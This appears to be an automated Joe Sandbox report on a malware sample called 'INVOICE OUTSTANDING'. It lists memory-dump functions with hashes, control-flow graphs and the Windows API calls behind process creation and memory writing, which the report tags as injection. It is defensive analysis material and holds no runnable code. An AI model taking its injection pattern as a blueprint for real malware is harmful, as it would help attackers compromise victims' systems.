                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `q~'
                                                                                                                          • API String ID: 0-1541917547
                                                                                                                          • Opcode ID: 3874c77dca492611c6dfe1afc39ed7feac86c94dc6004ac606e9b2408b9f939e
                                                                                                                          • Instruction ID: 8295895d954a4385e968391fd34521d329f0fc68e2db73d034ae75f1c99c930f
                                                                                                                          • Opcode Fuzzy Hash: 3874c77dca492611c6dfe1afc39ed7feac86c94dc6004ac606e9b2408b9f939e
                                                                                                                          • Instruction Fuzzy Hash: 5B024AB1A1520ADFCB14CF99D4818EEFBB2FF59300B24946AD506EB315E734A952CF90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B63A8 Relevance: 1.6, Strings: 1, Instructions: 314COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 666 78b63a8-78b63cd 668 78b63cf 666->668 669 78b63d4-78b6410 666->669 668->669 741 78b6412 call 78b69c9 669->741 742 78b6412 call 78b69d8 669->742 671 78b6418 672 78b641f-78b643b 671->672 673 78b643d 672->673 674 78b6444-78b6445 672->674 673->671 673->674 675 78b644a-78b6456 673->675 676 78b66c9-78b66e9 673->676 677 78b65cf-78b65db 673->677 678 78b654c-78b6558 673->678 679 78b6802-78b6815 673->679 680 78b6502-78b6517 673->680 681 78b6580-78b6595 673->681 682 78b67c6-78b67e6 673->682 683 78b6644-78b6650 673->683 684 78b659a-78b65b1 673->684 685 78b649e-78b64b5 673->685 686 78b651c-78b6520 673->686 687 78b6791-78b679a 673->687 688 78b64d6-78b64eb 673->688 689 78b6695-78b66a1 673->689 690 78b67eb-78b67fd 673->690 691 78b66ee-78b66fa 673->691 692 78b662d-78b663f 673->692 693 78b676c-78b678c 673->693 694 78b6725-78b6737 673->694 695 78b64ba-78b64d1 673->695 696 78b65f9-78b6605 673->696 697 78b673c-78b6740 673->697 698 78b6471-78b6475 673->698 699 78b64f0-78b64fd 673->699 700 78b65b6-78b65ca 673->700 674->679 721 78b6458 675->721 722 78b645d-78b646f 675->722 676->672 711 78b65dd 677->711 712 78b65e2 677->712 709 78b655a 678->709 710 78b655f-78b657b 678->710 680->672 681->672 682->672 715 78b6652 683->715 716 78b6657-78b666d 683->716 684->672 685->672 707 78b6533-78b653a 686->707 708 78b6522-78b6531 686->708 705 78b67ad-78b67b4 687->705 706 78b679c-78b67ab 687->706 688->672 717 78b66a8-78b66c4 689->717 718 78b66a3 689->718 690->672 719 78b66fc 691->719 720 78b6701-78b6720 691->720 692->672 693->672 694->672 695->672 713 78b660c-78b6628 696->713 714 78b6607 696->714 701 78b6753-78b675a 697->701 702 78b6742-78b6751 697->702 703 78b6488-78b648f 698->703 704 78b6477-78b6486 698->704 699->672 700->672 723 78b6761-78b6767 701->723 702->723 724 78b6496-78b649c 703->724 704->724 726 78b67bb-78b67c1 705->726 706->726 728 78b6541-78b6547 707->728 708->728 709->710 710->672 711->712 733 78b65ec-78b65f4 712->733 713->672 714->713 715->716 738 78b666f 716->738 739 78b6674-78b6690 716->739 717->672 718->717 719->720 720->672 721->722 722->672 723->672 724->672 726->672 728->672 733->672 738->739 739->672 741->671 742->671
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `q~'
                                                                                                                          • API String ID: 0-1541917547
                                                                                                                          • Opcode ID: e1b6cde1a378b20e2543c40a692e40bb3090e11b3ddd64bb37d8f9d2f7d52cf2
                                                                                                                          • Instruction ID: e7f1d697452a841a4af392ec829a36501d6a725b9bbfdc4f7a9107294f0f2a1c
                                                                                                                          • Opcode Fuzzy Hash: e1b6cde1a378b20e2543c40a692e40bb3090e11b3ddd64bb37d8f9d2f7d52cf2
                                                                                                                          • Instruction Fuzzy Hash: A1D127B0E1460ADFCB54CF95C4818AEFBB2FF99300F14D569D616AB314E734AA428F94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078BD3F0 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: OgW
                                                                                                                          • API String ID: 0-2993439660
                                                                                                                          • Opcode ID: 747c5d80c001cbeacf47fa533629a833a7ef7517b9a41bb6e64370ba3f18146a
                                                                                                                          • Instruction ID: 2759afb2758bbf1659f89d31bdf8087e9c0e68b83555be0fadee7c9a74ac8508
                                                                                                                          • Opcode Fuzzy Hash: 747c5d80c001cbeacf47fa533629a833a7ef7517b9a41bb6e64370ba3f18146a
                                                                                                                          • Instruction Fuzzy Hash: DBA126B0E142199BCB18CFA9C5845DEFBF2BF99304F14D16AD418EB358D734A942CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 08320006 Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 6p{k
                                                                                                                          • API String ID: 0-3059615964
                                                                                                                          • Opcode ID: 5613543dd110d3d3e81dfea93e2f65284faaac12ba482604d4e66369cb3f49ad
                                                                                                                          • Instruction ID: ce6a77d1aed517bc106bef5cb3d9fbc878b9f141afb9dc6896bbf28c1af6f5ec
                                                                                                                          • Opcode Fuzzy Hash: 5613543dd110d3d3e81dfea93e2f65284faaac12ba482604d4e66369cb3f49ad
                                                                                                                          • Instruction Fuzzy Hash: 34613771D0466ACFDB29CF65CC40B9ABBB2AF89300F1481EAD148AB655EB705A85CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 08320040 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 6p{k
                                                                                                                          • API String ID: 0-3059615964
                                                                                                                          • Opcode ID: c9f96b68a77961b5d27e25aad1e0ffec536f0623aa65bfc65536e24cfc36e960
                                                                                                                          • Instruction ID: 68ebd18f3281e255336f9b6178087b4a102503da9a2ab307c6030f386d417758
                                                                                                                          • Opcode Fuzzy Hash: c9f96b68a77961b5d27e25aad1e0ffec536f0623aa65bfc65536e24cfc36e960
                                                                                                                          • Instruction Fuzzy Hash: 22515771E1462ACBDB28CF65CD40BDDBBB6BFD8300F1082AAD50DA6654EB705A848F40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0832026A Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 6p{k
                                                                                                                          • API String ID: 0-3059615964
                                                                                                                          • Opcode ID: 8a787c4b67e11605d046ec70ae30ab8afe913b7a6fa34d7fd36dcc349b7994eb
                                                                                                                          • Instruction ID: 7627b6ba874bf2bc4aae195eacc83c3ace644f2995d52fb27974cfbb4545817c
                                                                                                                          • Opcode Fuzzy Hash: 8a787c4b67e11605d046ec70ae30ab8afe913b7a6fa34d7fd36dcc349b7994eb
                                                                                                                          • Instruction Fuzzy Hash: 2C510775D5162ACBDB64CF64C980BDDB7B2FB98300F1096EAD109A6654EB70AAC4CF40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 083221DF Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Zz4:
                                                                                                                          • API String ID: 0-2712991513
                                                                                                                          • Opcode ID: ebf401c2e800aaf40c6b1384b556c56ea5b2c53665af49fba33c14ea634cc114
                                                                                                                          • Instruction ID: 8de4a5259fd4d3b01871e014dc32cd31e4db7e0e00eb30a83f590c1f95407640
                                                                                                                          • Opcode Fuzzy Hash: ebf401c2e800aaf40c6b1384b556c56ea5b2c53665af49fba33c14ea634cc114
                                                                                                                          • Instruction Fuzzy Hash: C5415970E05318DFCB14CFA4D9C499EFFB6AF89311F24682AD116B7659D334A582CB04
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 083202AE Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 6p{k
                                                                                                                          • API String ID: 0-3059615964
                                                                                                                          • Opcode ID: cc1f20292b5350921cb231ba079b7857a5c46d415ea898c3c3c657d41ab1c8d7
                                                                                                                          • Instruction ID: 97376c3a4387c94eeb5dc471199d4780e7d663b73887ad22749a15e1cc12d75f
                                                                                                                          • Opcode Fuzzy Hash: cc1f20292b5350921cb231ba079b7857a5c46d415ea898c3c3c657d41ab1c8d7
                                                                                                                          • Instruction Fuzzy Hash: 20512670D5062ACFDB74CF64CD80BDDB7B2BB98300F1096EAD149A6654EB706AC48F40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B3DE2 Relevance: .2, Instructions: 249COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: add84da65163704c54b3340edcff9b26b032253bcfefdf7d7f38b5964e3f96fc
                                                                                                                          • Instruction ID: 8ed6484cc245329f7b4faaeff41f7f3dd30453ff88623b01d31c4a497cf7c5e8
                                                                                                                          • Opcode Fuzzy Hash: add84da65163704c54b3340edcff9b26b032253bcfefdf7d7f38b5964e3f96fc
                                                                                                                          • Instruction Fuzzy Hash: E2A1E2B4E14209CFDB14CFA9D8909DEBBB2EF89310F24812AE415EB754DB34A956CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B3E70 Relevance: .2, Instructions: 189COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 603fa41c5e4df01c79cca8dd2839678b3ea945c954b85caab9fac468524e5d1a
                                                                                                                          • Instruction ID: 7949136c75427ca8bcb9c79dbaf058400f29538bbda849157f4163ecb5ff6012
                                                                                                                          • Opcode Fuzzy Hash: 603fa41c5e4df01c79cca8dd2839678b3ea945c954b85caab9fac468524e5d1a
                                                                                                                          • Instruction Fuzzy Hash: 2981C1B4E10619CFDB18CFA9C994AEEBBB2FF89300F10912AD519AB354DB345946CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B9628 Relevance: .1, Instructions: 106COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1602ab6c3bfe7ffa8246c769305c90713cd0de62bbb3512289b94bb8640617db
                                                                                                                          • Instruction ID: 49fe46d0bbc0be2247b4afdf527c5300d80cba307f6b8f43582479d0c7a95069
                                                                                                                          • Opcode Fuzzy Hash: 1602ab6c3bfe7ffa8246c769305c90713cd0de62bbb3512289b94bb8640617db
                                                                                                                          • Instruction Fuzzy Hash: 61415CB1E01618CBDB28DF6B9D4569AFAF3BFC9200F14C1BA950CA6214DB341A868E11
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B9627 Relevance: .1, Instructions: 94COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b5b4de607d5845162fdfa66dae0ed73dc889a170207a97415821044b9f37d655
                                                                                                                          • Instruction ID: 7021d45f06adce11fa14bb89e794cc7945d03f6e1248201eb4608d5a9fc53bbc
                                                                                                                          • Opcode Fuzzy Hash: b5b4de607d5845162fdfa66dae0ed73dc889a170207a97415821044b9f37d655
                                                                                                                          • Instruction Fuzzy Hash: 35412DB1E01618CBDB68DF6B9D4578AFAF3BFC8200F14C1BA950CA6254DB3409858F11
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B5478 Relevance: .1, Instructions: 68COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b417989db5093ee6cb23d6103c3872adb01edb2ff33fd91616979bbdfe075571
                                                                                                                          • Instruction ID: c59e2875157793dba6b9785cca03134501fa285cf0d87d3d5e628723c515f219
                                                                                                                          • Opcode Fuzzy Hash: b417989db5093ee6cb23d6103c3872adb01edb2ff33fd91616979bbdfe075571
                                                                                                                          • Instruction Fuzzy Hash: A121D6B1E006188BEB18CF9AD8447DEBBF3AFC9310F14C16AD509A6258DB741A55CF51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 078B546B Relevance: .1, Instructions: 64COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d4ec51260e90e20160d8ff0607d655f3614e6e41232c93fd0abad94a44b450f1
                                                                                                                          • Instruction ID: 4ed9faffd959565b5059d1f85d0f3c3381e16db6c61ee635ac1ab9ef524e2480
                                                                                                                          • Opcode Fuzzy Hash: d4ec51260e90e20160d8ff0607d655f3614e6e41232c93fd0abad94a44b450f1
                                                                                                                          • Instruction Fuzzy Hash: 3C21B4B1E006188BEB18CFAAD8547DEBFF3AFC9310F14C169D409A6258DB745956CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 08324440 Relevance: .1, Instructions: 64COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a4e7fcf19630235295d6fa4bdddf26aa304af11a382b3ad5b518ab013a01c752
                                                                                                                          • Instruction ID: 43965d666e141a9825ba42663b82defa2982ebe94cbb10c1793b28904378fa14
                                                                                                                          • Opcode Fuzzy Hash: a4e7fcf19630235295d6fa4bdddf26aa304af11a382b3ad5b518ab013a01c752
                                                                                                                          • Instruction Fuzzy Hash: 1021DF71C04268CFCB108FA4D4587EEBBF0AB8E306F15446AD041B7281D7748948CB68
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 014BBA61 Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 014BBAD0
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 014BBB0D
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 014BBB4A
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 014BBBA3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2063062207-0
                                                                                                                          • Opcode ID: e3a052cdc9c60244072f7ceee07d3852b2c1c92140f3a79b4addc310f99dfbf4
                                                                                                                          • Instruction ID: 517b4b0f72b9df84e466a723ab40dfc27bbd74fdf0460ea4f9404f16554f5623
                                                                                                                          • Opcode Fuzzy Hash: e3a052cdc9c60244072f7ceee07d3852b2c1c92140f3a79b4addc310f99dfbf4
                                                                                                                          • Instruction Fuzzy Hash: 045163B49007488FDB14CFA9C998BDEBFF0EB48304F24805AE409A77A1DB74A944CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 014BBA70 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 014BBAD0
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 014BBB0D
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 014BBB4A
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 014BBBA3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2063062207-0
                                                                                                                          • Opcode ID: 07cca4abb6a791cd2800db0965590348ac0e16bede1d1890cc4f5884a5a3fbb1
                                                                                                                          • Instruction ID: b19081d9ca0deb0025a887d50f6830fe328d17808f37037cdcdb5593e323f86c
                                                                                                                          • Opcode Fuzzy Hash: 07cca4abb6a791cd2800db0965590348ac0e16bede1d1890cc4f5884a5a3fbb1
                                                                                                                          • Instruction Fuzzy Hash: FF5153B49007498FDB14CFAAC998BDEBBF0EF48314F20805AE019A77A0DB749944CF65
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 014B9788 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 334 14b9788-14b979d call 14b8a94 337 14b979f 334->337 338 14b97b3-14b97b7 334->338 390 14b97a5 call 14b9a02 337->390 391 14b97a5 call 14b9a10 337->391 339 14b97cb-14b980c 338->339 340 14b97b9-14b97c3 338->340 345 14b9819-14b9827 339->345 346 14b980e-14b9816 339->346 340->339 341 14b97ab-14b97ad 341->338 342 14b98e8-14b99a8 341->342 383 14b99aa-14b99ad 342->383 384 14b99b0-14b99db GetModuleHandleW 342->384 348 14b984b-14b984d 345->348 349 14b9829-14b982e 345->349 346->345 350 14b9850-14b9857 348->350 351 14b9839 349->351 352 14b9830-14b9837 call 14b8aa0 349->352 353 14b9859-14b9861 350->353 354 14b9864-14b986b 350->354 357 14b983b-14b9849 351->357 352->357 353->354 358 14b9878-14b9881 call 14b8ab0 354->358 359 14b986d-14b9875 354->359 357->350 364 14b988e-14b9893 358->364 365 14b9883-14b988b 358->365 359->358 367 14b98b1-14b98b5 364->367 368 14b9895-14b989c 364->368 365->364 388 14b98b8 call 14b9d08 367->388 389 14b98b8 call 14b9cf8 367->389 368->367 369 14b989e-14b98ae call 14b8ac0 call 14b8ad0 368->369 369->367 371 14b98bb-14b98be 374 14b98e1-14b98e7 371->374 375 14b98c0-14b98de 371->375 375->374 383->384 385 14b99dd-14b99e3 384->385 386 14b99e4-14b99f8 384->386 385->386 388->371 389->371 390->341 391->341
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 014B99CE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4139908857-0
                                                                                                                          • Opcode ID: 00610444733cc6a92e00ace2b91efa24a552ea4ee668aafb81bdfb38a3a249c7
                                                                                                                          • Instruction ID: ad88f08e3b976da3c99aa8b9e8fa4a5af7a94986f071d567776f4df790002522
                                                                                                                          • Opcode Fuzzy Hash: 00610444733cc6a92e00ace2b91efa24a552ea4ee668aafb81bdfb38a3a249c7
                                                                                                                          • Instruction Fuzzy Hash: F47108B0A10B058FD724DF2AD49479BBBF5BF88208F10892ED54ADBB50D775E805CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0832165C Relevance: 1.6, APIs: 1, Instructions: 148processCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 582 832165c-832165d 583 8321660 582->583 584 8321664-8321667 582->584 583->584 585 8321668-83216f3 583->585 584->585 587 83216f5-83216fb 585->587 588 83216fe-8321705 585->588 587->588 589 8321710-8321726 588->589 590 8321707-832170d 588->590 591 8321731-83217ce CreateProcessW 589->591 592 8321728-832172e 589->592 590->589 594 83217d0-83217d6 591->594 595 83217d7-832184b 591->595 592->591 594->595 603 832185d-8321864 595->603 604 832184d-8321853 595->604 605 8321866-8321875 603->605 606 832187b 603->606 604->603 605->606 608 832187c 606->608 608->608
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 083217BB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 963392458-0
                                                                                                                          • Opcode ID: 7aebd76b63017d7d8488e98c331abc9ea4b83aa0644adc833800e95187cd1537
                                                                                                                          • Instruction ID: 2a4b3be49e5f9469a9e84c3e47224b82953e95e7b3d6add127a68ec93e646020
                                                                                                                          • Opcode Fuzzy Hash: 7aebd76b63017d7d8488e98c331abc9ea4b83aa0644adc833800e95187cd1537
                                                                                                                          • Instruction Fuzzy Hash: C0510771D00328DFDB24DF99C980BDDBBB5AF88314F148099E808A7650DB75AA89CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 08321668 Relevance: 1.6, APIs: 1, Instructions: 143processCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 609 8321668-83216f3 611 83216f5-83216fb 609->611 612 83216fe-8321705 609->612 611->612 613 8321710-8321726 612->613 614 8321707-832170d 612->614 615 8321731-83217ce CreateProcessW 613->615 616 8321728-832172e 613->616 614->613 618 83217d0-83217d6 615->618 619 83217d7-832184b 615->619 616->615 618->619 627 832185d-8321864 619->627 628 832184d-8321853 619->628 629 8321866-8321875 627->629 630 832187b 627->630 628->627 629->630 632 832187c 630->632 632->632
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 083217BB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 963392458-0
                                                                                                                          • Opcode ID: 84c6063aac203641226709bb802aeebc192ed3ea8d79ac49dc8c2131a806f3d9
                                                                                                                          • Instruction ID: 7f81030acb79c5e40d86318503348af12ce1f3d8ba8bec6324eaa8919fc707bf
                                                                                                                          • Opcode Fuzzy Hash: 84c6063aac203641226709bb802aeebc192ed3ea8d79ac49dc8c2131a806f3d9
                                                                                                                          • Instruction Fuzzy Hash: 73510771D00329DFDB24DF99C980BDDBBB5BF88314F148099E808A7650DB71AA89CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 08321C08 Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 644 8321c08-8321c09 645 8321c10-8321c61 644->645 646 8321c0c 644->646 648 8321c63-8321c6f 645->648 649 8321c71-8321caa WriteProcessMemory 645->649 646->645 648->649 650 8321cb3-8321cd4 649->650 651 8321cac-8321cb2 649->651 651->650
                                                                                                                          APIs
